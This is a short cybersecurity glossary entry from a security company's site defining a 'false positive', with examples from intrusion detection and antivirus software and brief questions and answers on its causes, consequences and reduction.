Jericho Security | Glossary

Jericho's Cybersecurity Glossary | False Positive

Written by Jericho Security Team | September 27, 2024

Definition:

A false positive occurs when a security system incorrectly identifies benign activity as malicious, triggering an alert or blocking a legitimate action.

Use Cases:

  • Used to describe scenarios where an intrusion detection system (IDS) flags normal network activity as a threat.
  • Employed in antivirus software when it mistakenly identifies legitimate files as malware.

Related Terms:

Questions and Answers:

  • What causes false positives in security systems?
    False positives can result from overly strict detection rules, poorly configured systems, or legitimate activity that resembles malicious behavior.

  • What are the consequences of false positives?
    False positives can lead to wasted time investigating harmless incidents, decreased productivity, and system disruptions.

  • How can false positives be reduced?
    False positives can be reduced by fine-tuning detection rules, using better threat intelligence, and improving system configuration.